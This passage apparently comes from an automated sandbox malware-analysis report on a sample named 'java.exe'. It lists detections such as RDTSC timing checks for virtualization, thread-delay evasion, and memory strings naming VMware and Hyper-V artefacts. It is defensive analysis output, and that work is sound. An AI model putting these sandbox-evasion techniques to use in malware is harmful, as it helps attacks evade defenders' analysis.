            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Windows\SysWOW64\winver.exeRDTSC instruction interceptor: First address: 00000000047E2FAD second address: 00000000047E2FD6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 stosd 0x00000005 mov eax, dword ptr [ebx+004042B5h] 0x0000000b stosd 0x0000000c mov eax, dword ptr [ebx+004042B9h] 0x00000012 stosd 0x00000013 mov eax, dword ptr [ebx+00406820h] 0x00000019 stosd 0x0000001a mov eax, dword ptr [ebx+00406824h] 0x00000020 stosd 0x00000021 lea eax, dword ptr [ebp-00000700h] 0x00000027 sub edi, eax 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02220005 rdtsc 0_2_02220005
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 636Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-3045
            Source: C:\Windows\SysWOW64\winver.exe TID: 6380Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exe TID: 6380Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\winver.exe TID: 6572Thread sleep count: 57 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exe TID: 6380Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\ctfmon.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\smartscreen.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\ApplicationFrameHost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: SearchApp.exe, 0000000B.00000000.1825708254.0000024340FB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dx0ma3d6fxrucbibtqempqemuae&or=w
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \Moneysoft\Pay*|vmware workstation 12 player*|vmpl5459
            Source: SearchApp.exe, 0000000B.00000000.1845079625.0000024B43440000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: hyper-v
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\E20-II\H*|vmware horizon client*|vdi38940FB-4BFC-874A*|voice recorder*|voice recording8034ocExplor*|watchtower research*|wtr1433874A-C0F2E0B9FA*|web intelligence rich client*|webi1405.exe*|vmware vsphere client*|vcenter5038200E}\Mic*|vmware horizon client*|vm ware8394C:\E20-II*|vpn access manager*|shrew3128tware.DebutVid*|whatsapp desktop*|whatsp9331t12535
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: TOSHIBA*|win-pak user interface*|winpak1154C14E77-02*|vmware horizon client*|view5503exe12536
            Source: svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;I!
            Source: explorer.exe, 00000003.00000000.1715884676.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1715884676.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1795027301.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3016216647.0000019E29F00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SearchApp.exe, 0000000B.00000000.1882162991.0000024B54FD2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: explorer.exe, 00000003.00000000.1716420697.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: SearchApp.exe, 0000000B.00000000.1845864904.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1930876854.0000024B5866C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: var fbpkgiid = fbpkgiid || {}; fbpkgiid.page = '';;(function(BingAtWork) { if (typeof (bfbWsbTel) !== "undefined") { BingAtWork.WsbWebTelemetry.init({"cfg":{"e":true,"env":"PROD","t":"33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176"},"ig":"892FA07886414BDF8EE1764A59FF39C6","ConversationId":"21139c92-d559-45ad-9d8f-73e2a64bf7e7","LogicalId":"30363daf-0e99-4b56-afae-f0c5eee8522a","tid":"651d53d035ec4c7eba14a4092e8aedb0","sid":"193A581F83766B4319784BBF829B6A16","uid":"","muid":"6666694284484FA1B35CCB433D42E997","puid":null,"isMtr":false,"tn":null,"tnid":null,"msa":false,"mkt":"en-us","b":"edge","eref":"Ref A: 651d53d035ec4c7eba14a4092e8aedb0 Ref B: MWHEEEAP0024F6D Ref C: 2023-10-04T12:00:16Z","vs":{"BAW12":"BFBBCEJIT2","BAW2":"BFBSPRC","BAW5":"PREMSBCUSTVERT","BAW7":"BFBPROWSBINITCF","CLIENT":"WINDOWS","COLUMN":"SINGLE","FEATURE.BFBBCEJIT":"1","FEATURE.BFBBCEJIT2":"1","FEATURE.BFBEDUQWQSCLKWSB":"1","FEATURE.BFBPROWSBINITCF":"1","FEATURE.BFBREFRPLAN":"1","FEATURE.BFBSPRC":"1","FEATURE.BFBWSBRS0830TF":"1","FEATURE.MSAAUTOJOIN":"1","FEATURE.MSBDSBIGLEAM":"1","FEATURE.MSBDSBORGV2":"1","FEATURE.MSBDSBORGV2CO":"1","FEATURE.MSBWDSBI920T1":"1","FEATURE.MSNSBT1":"1","FEATURE.WSBREF-T":"1","MKT":"EN-US","MS":"0","NEWHEADER":"1","THEME":"THBRAND","UILANG":"EN"},"dev":"DESKTOP","os":"WINDOWS","osver":"11","dc":"CoreUX-Prod-MWHE01","canvas":"","sci":true,"isMidgardEnabled":true,"isHomepage":false,"snrVersion":"2023.10.03.39942242"}); } })(BingAtWork || (BingAtWork = {}));;_w.rms.js({'A:rms:answers:BoxModel:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
            Source: SearchApp.exe, 0000000B.00000000.1845079625.0000024B43440000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: hyper-vOs and f
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 7247*|visual studio 2017*|devenv5729*|visual studio 2019*|devenv6360*|visual studio code*|visual code6793*|visual studio code*|vs code6786*|visual studio code*|visuak9719*|visual studio code*|visula8564*|visual studio code*|vscode4061*|visual studio code*|visau9561*|visual studio code*|visy9233*|visual studio code*|vius9283*|visual studio code - insiders*|vscode3094*|vlc media player*|vlcx9264*|vlc media player*|vcl6591*|vlc media player*|vkc8367*|vlc media player*|vld8570*|vlc media player*|vls7178*|vlc media player*|vlv7112*|vlc media player*|vlx7027*|vmware horizon client*|vm ware8394*|vmware horizon client*|vmare7220*|vmware horizon client*|view5503*|vmware horizon client*|vdi3894*|vmware vsphere client*|vcenter5038*|vmware vsphere client*|vspe6388*|vmware workstation 12 player*|vmpl5459*|vmware workstation 15 player*|vmplayer6438*|vnc viewer*|vncviewer7745*|vnc viewer*|vnd7746*|vnc viewer*|vnx6976*|voice recorder*|audio recording:wux:audio recording8489*|voice recorder*|sound recording:wux:sound recording8965*|voice recorder*|voice recording8034*|voice recorder*|audio recorder:wux:audio recorder7503*|voice recorder*|sound recorder:wux:sound recorder6282*|voice recorder*|record audio:wux:record audio7754*|voice recorder*|record sound:wux:record sound9205*|voice recorder*|record voice:wux:record voice8950*|voice recorder*|recording5394*|voice recorder*|recoder7796*|voice recorder*|recore7975*|voice recorder*|vioce7936*|voice recorder*|vocie7658*|voice recorder*|voicw7747*|voice recorder*|voive7567*|voice recorder*|recr7897*|voice recorder*|vice8986*|voice recorder*|voie7948*|voicemeeter*|voicemeter5588*|voicemod*|voice mod6034*|volume activation management tool 3.1*|vamt1*|voyager workstation administration*|vwa1*|vpn access manager*|shrew3128*|vyprvpn*|vyper3185*|v
            Source: explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
            Source: SearchApp.exe, 0000000B.00000003.1889880818.0000024B5CB61000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|chrome655*|herramienta recortes*|sni2296*|hourly analysis program 4.50*|hap1*|gotomeeting*|go to meeting7076*|google chrome*|googlechrome10860*|google play music*|google music3025*|heroes of the storm*|heros4494*|google chrome*|gogle chrome12063*|integrated architecture builder*|iab1*|ic business manager*|icb1577*|hourly analysis program 5.01*|hap1*|hp scan and capture*|hpscan6530*|hourly analysis program 4.91*|hap1*|ibm integration toolkit 10.0.0.7*|iib403*|hyper-v manager*|hyper v4919*|hourly analysis program 4.90*|hap375*|hpe records manager*|trim1399*|ibm notes (basic)*|lotus3079*|hyper-v manager*|virtual5441*|ibm integration toolkit 10.0.0.10*|iib1*|idle (python 3.7 64-bit)*|idel5996*|hpe unified functional testing*|uft1*|hp support assistant*|hp ass4184*|hpe content manager*|trim1743*|hp support assistant*|hps5179*|ibm integration toolkit 10.0.0.11*|iib1*|idle (python 3.7 32-bit)*|idel6028*|hourly analysis program 5.10*|hap1*|idle (python gui)*|python idle5336*|ibm integration toolkit 10.0.0.15*|iib1*|image composite editor*|ice852*|import passwords*|lastpass1242*|hp unified functional testing*|uft1*|income tax planner workstation*|bna1*|instrument de decupare*|snipp3115*|huawei operation & maintenance system*|lmt1*|i.r.i.s. ocr registration*|iris1117*|ibm integration toolkit 10.0.0.13*|iib1*|ibm integration toolkit 10.0.0.12*|iib1*|hourly analysis program 5.11*|hap114*|internet download manager*|idn6970*|internet explorer*|internet exploerer12012*|internet download manager*|ib8855*|internet explorer*|interner explorer12898*|internet explorer*|internet exployer11237*|internet download manager*|
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vm ware8394
            Source: explorer.exe, 00000003.00000000.1716420697.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
            Source: explorer.exe, 00000003.00000000.1715884676.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
            Source: SearchApp.exe, 0000000B.00000000.1845305822.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 5470*|hourly analysis program 4.50*|hap1*|hourly analysis program 4.80*|hap1*|hourly analysis program 4.90*|hap375*|hourly analysis program 4.91*|hap1*|hourly analysis program 5.01*|hap1*|hourly analysis program 5.10*|hap1*|hourly analysis program 5.11*|hap114*|hp scan*|scanner6717*|hp scan*|hpscan6355*|hp scan and capture*|hpscan6530*|hp smart*|hp printer5188*|hp smart*|hpsmart6013*|hp smart*|hp sca9057*|hp support assistant*|hp ass4184*|hp support assistant*|hps5179*|hp unified functional testing*|uft1*|hpe content manager*|trim1743*|hpe records manager*|trim1399*|hpe unified functional testing*|uft1*|huawei operation & maintenance system*|lmt1*|hulu*|huliu7717*|hulu*|hullu8132*|hulu*|huluu8464*|hulu*|huku5970*|hulu*|hule8326*|hulu*|julu8142*|hulu*|hlu6552*|hulu*|huu6329*|hwmonitor*|cpui5297*|hy-8 7.50*|hy81652*|hyper-v manager*|hyper v4919*|hyper-v manager*|virtual5441*|hyper-v manager*|hyperv4178*|hyper-v manager*|vm4595*|hyperspace*|epic708*|i.r.i.s. ocr registration*|iris1117*|ibm integration toolkit 10.0.0.10*|iib1*|ibm integration toolkit 10.0.0.11*|iib1*|ibm integration toolkit 10.0.0.12*|iib1*|ibm integration toolkit 10.0.0.13*|iib1*|ibm integration toolkit 10.0.0.15*|iib1*|ibm integration toolkit 10.0.0.7*|iib403*|ibm notes*|lotus2695*|ibm notes (basic)*|lotus3079*|ic business manager*|icb1577*|icloud*|i cloud5863*|icloud*|icould6247*|icloud*|iclu6932*|icloud photos*|pictures4048*|icloud photos*|i cloud5074*|icloud photos*|iphoto5036*|idle (python 3.7 32-bit)*|idel6028*|idle (python 3.7 64-bit)*|idel5996*|idle (python gui)*|python idle5336*|iheartradio*|i heart4638*|image composite editor*|ice852*|import passwords*|lastpass1242*|income tax planner*|bna1*|income tax planner workstation*|bna1*|inform*|ddi600*|information assistant*|ia1*|instagram*|instagra,10481*|instagram*|instagrm10522*|instagram*|instgram9142*|instagram*|instra10065*|instagram*|insat9464*|instagram*|insra10498*|instagram*|insts10256*|instagram*|isnta8095*|instagram*|inss10150*|instagram*|insy10074*|instagram*|ista9884*|instrument de decupare*|snipp3115*|intapp time*|dte2830*|integrated architecture builder*|iab1*|integrated dealer systems - g2*|ids1249*|integrated operations system*|ios1*|intel(r) extreme tuning utility*|xtu1972*|intellij idea community edition 2019.1.3*|inteli4762*|interaction administrator*|ia2559*|interactive ruby*|irb416*|interactive sql*|dbisql959*|internet download accelerator*|ida842*|internet download manager*|idman7834*|internet download manager*|idmm8541*|internet download manager*|intr7920*|internet download manager*|don8066*|internet download manager*|id,7596*|internet download manager*|idn6970*|internet download manager*|imd6996*|internet download manager*|ine9116*|internet download manager*|
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .exe*|vmware vsphere client*|vcenter5038
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0*|vmware vsphere client*|vspe6388axis Merge v*|voice recorder*|recording5394-4BFC-874A-C0F*|whatsapp desktop*|whatsup8240ulzbot.exe125*|wacom tablet properties*|intuos6552}\MEGA L*|watchtower media suite*|wms1er.exe12532
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7*|vmware workstation 15 player*|vmplayer6438a*|whatsapp desktop*|whatapp7624{6D809377-6AF0*|whatsapp desktop*|whatss9497oogle Web Desig*|windows defender*|antivirus6866TerminalBrid*|visual studio code - insiders*|vscode3094re*|whatsapp desktop*|whats app6940p12539
            Source: explorer.exe, 00000003.00000002.3050739275.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 12 player*|vmpl5459
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|vm4595
            Source: explorer.exe, 00000003.00000002.3084368988.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vmare7220
            Source: RuntimeBroker.exe, 00000011.00000000.1948613471.000001D175C80000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000002.3093722755.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 15 player*|vmplayer6438
            Source: explorer.exe, 00000003.00000002.2977124293.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
            Source: explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C14E77-02*|vmware horizon client*|view5503
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|mstsc164340E*|virtual account numbers*|citi515tars.NET\Po*|visual studio code*|vscode4061mes\S4League\*|visual studio 2013*|devenv63460000000000000*|visual studio code*|visy9233teHome_1\BIN\rw*|virtual machine manager console*|vmm4890F2E*|visual studio code*|vius9283EXCEL.EXE12531*|unified agent desktop client*|uad569isual P*|windows 7 usb dvd download tool*|win 742196*|windows defender*|windos71090E}\Minitab\Min*|vmware horizon client*|vmare7220444B-8957-A*|wacom preferences*|bamboo36521
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7*|vmware workstation 15 player*|vmplayer6438
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\E20-II\H*|vmware horizon client*|vdi3894
            Source: SearchApp.exe, 0000000B.00000000.1820370567.0000024339C3F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1826418071.00000243411CA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5*|whatsapp desktop*|watsapp9387\Moneysoft\Pay*|vmware workstation 12 player*|vmpl5459BFC-8*|windows defender*|widows7869Print CD\PrintC*|windows defender*|window defender6856B28FC2*|watchtower translation system*|wts244.AppRa*|windows explorer*|file:wux:file941tnyxGame\*|windows fax and scan*|scanb8973C5A40EF-A0FB*|windows fax and scan*|scan to computer8128l*|windows fax and scan*|scabn9201B-8957-A3773*|windows fax and scan*|sscan850464.exe12540*|windows live mail*|email:wux:email3973way S*|windows defender*|virus:wux:virus6030stmanC*|windows fax and scan*|scan and fax89874B-89*|windows fax and scan*|scana9910 Poker.exe1*|windows media player*|windows meda8882\Nuts*|windows media player*|windowsmedia9200-874A*|windows fax and scan*|hp scanner7923megaded*|windows fax and scan*|scanned767694012542
            Source: svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;nlse]
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0*|vmware vsphere client*|vspe6388
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyperv4178
            Source: SearchApp.exe, 0000000B.00000000.1825708254.0000024340FB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wQ%
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1889880818.0000024B5CB61000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|virtual5441
            Source: SearchApp.exe, 0000000B.00000003.1899996863.0000024B5CB40000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.View.Client12451
            Source: winver.exe, 00000002.00000002.2975713129.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: SearchApp.exe, 0000000B.00000003.1899996863.0000024B5CB40000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Evolution Soccer 2018\PES2018.exe12439C:\Ignition\IgnitionCasino.exe12440{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\SplashData\SplashID Safe\SplashID Safe.exe12440{6D809377-6AF0-444B-8957-A3773F02200E}\Native Instruments\Komplete Kontrol\Komplete Kontrol.exe1244025342asdf3333.StoppuhrTimer_1xbryz0n7krfa!App12441{6D809377-6AF0-444B-8957-A3773F02200E}\OWASP\Zed Attack Proxy\ZAP.exe12441{6D809377-6AF0-444B-8957-A3773F02200E}\Dell\Toad for Oracle 2015 R2 Suite\Toad for Oracle 12.8\Toad.exe12441{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MySQL\MySQL Workbench 6.0 CE\MySQLWorkbench.exe12441212377Tik.7Tik-TikTokforWindows_da70t93mgq52j!App12442{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\AspenTech\APEx\Pe\ProcessExplorer.exe1244223140Kinderjoy.MovieMakerFree_4k9s1t26vykqt!App12443{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VoipConnect.com\VoipConnect\VoipConnect.exe12443{6D809377-6AF0-444B-8957-A3773F02200E}\SAS\JMPPRO\14\Jmp.exe12443{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MetaGeek\inSSIDer Home\inSSIDerHome.exe12443{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Accops HySecure 